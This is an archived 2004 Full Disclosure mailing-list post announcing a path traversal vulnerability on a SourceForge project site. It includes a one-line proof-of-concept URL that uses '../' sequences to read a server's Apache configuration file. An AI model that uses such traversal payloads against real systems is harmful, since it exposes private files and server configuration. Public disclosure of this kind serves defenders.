Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Vulnerability in sourceforge.net
From: "Alexander" <Pigrelax () yandex ru>
Date: Wed, 21 Jul 2004 09:36:21 +0400

Vulnerability in sourceforge.net.

Remote user can read any files. Example:

http://btmgr.sourceforge.net/index.php3?body=../../../../../../usr/local
/apache/conf/httpd.conf


------------------------------------------------------------------------
----------
www.Maxpatrol.com - MaxPatrol is a professional network security scanner
distinguished by its uncompromisingly high quality of scanning,
optimized for effective use by companies of any size (serving from a few
to tens of thousands of nodes).

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]